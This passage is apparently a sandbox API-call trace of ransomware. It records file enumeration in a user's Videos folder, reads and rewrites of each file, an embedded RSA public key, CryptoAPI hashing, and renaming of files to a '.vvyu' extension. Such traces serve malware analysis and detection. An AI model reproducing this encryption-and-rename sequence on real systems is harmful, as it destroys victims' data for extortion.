dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ced8 | out: hHeap=0x6a0000) returned 1 [0196.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.452] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0xf967, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0xf967, lpOverlapped=0x0) returned 1 [0196.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.453] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xf96c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.454] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.456] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.456] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.456] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.456] CloseHandle (hObject=0x52c) returned 1 [0196.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0196.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d3a670 [0196.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0196.459] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\qPf-R5Z.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\qpf-r5z.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\qPf-R5Z.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\qpf-r5z.mp4.vvyu")) returned 1 [0196.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.461] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.465] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8535e80, ftCreationTime.dwHighDateTime=0x1d898b7, ftLastAccessTime.dwLowDateTime=0xac17aea0, ftLastAccessTime.dwHighDateTime=0x1d8a58b, ftLastWriteTime.dwLowDateTime=0xac17aea0, ftLastWriteTime.dwHighDateTime=0x1d8a58b, nFileSizeHigh=0x0, nFileSizeLow=0x8dec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wlEnhA.flv", cAlternateFileName="")) returned 1 [0196.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0196.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.465] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\wlEnhA.flv") returned=".flv" [0196.465] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\wlEnhA.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\wlenha.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.466] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=36332) returned 1 [0196.466] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.469] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x8dc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.469] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.481] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.481] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x8dec, lpOverlapped=0x0) returned 1 [0196.482] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.482] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.482] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.482] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0196.483] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.483] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.483] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.483] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.484] GetLastError () returned 0x0 [0196.484] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.484] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0196.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.484] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.484] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.484] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8df0) returned 0x2d4b778 [0196.485] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ced8 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cf20 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.486] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0196.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0196.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2d0 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a2b8 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.490] GetCurrentThreadId () returned 0x264 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d47440 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.491] GetCurrentThreadId () returned 0x264 [0196.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0196.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2d0 [0196.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a330 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a348 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2e8 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2b8 [0196.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0196.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.495] HeapFree 